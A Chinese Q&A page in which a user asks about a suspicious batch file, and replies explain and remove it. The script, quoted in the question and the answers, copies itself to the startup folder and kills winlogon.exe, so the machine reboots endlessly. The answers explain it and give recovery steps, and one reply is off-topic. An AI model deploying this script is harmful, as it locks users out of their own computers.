我用记事本打开,看到了以下内容:
@echo off
set var=%userprofile%\「开始」菜单\程序\启动
xcopy/y %0 "%var%"\
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
如果这个文件是病毒的话,那运行后如何解决呢?
这个bat文件是做什么用的?
答案:4 悬赏:10 手机版
解决时间 2021-02-04 02:48
- 提问者网友:niaiwoma
- 2021-02-03 08:59
最佳答案
- 五星知识达人网友:西岸风
- 2021-02-03 09:35
绝对的病毒,不过也不能说是病毒,因为它没有传染性。属于恶意程序!
@echo off
::第一句没有什么含义。
set var=%userprofile%\「开始」菜单\程序\启动
::设置变量var为=%userprofile%\「开始」菜单\程序\启动 ,看到了吧,这里是开始菜单的启动文件夹。
xcopy/y %0 "%var%"\
复制自身到上面设置的地方,也就是开始菜单的启动文件夹
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
这里是结束winlogon.exe进程,如一楼所说,这是系统的核心进程,结束之后会崩溃或者是60秒倒计时关机,总之你必须重启。问题就出来了,重启之后系统还要执行开始菜单的启动文件夹的这个文件,所以它又会结束进程,继续重启。周而复始,永远无法用系统。
----好恶毒的制造者啊!
解决方法:你只要到“开始--程序--启动”里面删除那个.bat文件就可以了,但是如果你已经中招了,你只有进dos或者win pe系统删了,当然如果是60秒倒计时关机,你可以让系统启动以后立刻进入cmd。如下:
开始--运行--输入“cmd”确定---输入“shutdown -a”回车(注意shutdown后面有个空格)。
然后到上面的地方删除那个恶毒程序即可!
@echo off
::第一句没有什么含义。
set var=%userprofile%\「开始」菜单\程序\启动
::设置变量var为=%userprofile%\「开始」菜单\程序\启动 ,看到了吧,这里是开始菜单的启动文件夹。
xcopy/y %0 "%var%"\
复制自身到上面设置的地方,也就是开始菜单的启动文件夹
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
这里是结束winlogon.exe进程,如一楼所说,这是系统的核心进程,结束之后会崩溃或者是60秒倒计时关机,总之你必须重启。问题就出来了,重启之后系统还要执行开始菜单的启动文件夹的这个文件,所以它又会结束进程,继续重启。周而复始,永远无法用系统。
----好恶毒的制造者啊!
解决方法:你只要到“开始--程序--启动”里面删除那个.bat文件就可以了,但是如果你已经中招了,你只有进dos或者win pe系统删了,当然如果是60秒倒计时关机,你可以让系统启动以后立刻进入cmd。如下:
开始--运行--输入“cmd”确定---输入“shutdown -a”回车(注意shutdown后面有个空格)。
然后到上面的地方删除那个恶毒程序即可!
全部回答
- 1楼网友:归鹤鸣
- 2021-02-03 13:07
至少是恶意的,只需要看组后一句
cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul
这一行是让NTSD在CMD运行,NTSD是用来杀进程的,WINLOGON.EXE是WINDOWS的核心进程之一,一旦杀掉系统肯定会立即崩溃。
- 2楼网友:渡鹤影
- 2021-02-03 11:27
在del里 /f, 强制删除只读文件 /a,根据指定的属性删除文件 /q,指定静音状态。不提示您确认删除。 %1,变量1 \\?\%1,变量1指定的绝对路径及文件 unc路径的一个特例。unc路径就是符合 \\servername\sharename 格式,其中 servername 是服务器名,sharename 是共享资源的名称。?是统配符,表示匹配0个或1个任意字符。使用unc路径不会捡测路径中的保留字设备名称等,因此可以用这种方法来删除特殊文件或目录。 ?\可以理解成遍历,?是统配符,表示匹配0个或1个任意字符。 .\代表本地节点,在概念上来有点像磁盘根目录,也可以说成是计算机根目录。
- 3楼网友:三千妖杀
- 2021-02-03 10:55
是病毒文件。。。
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯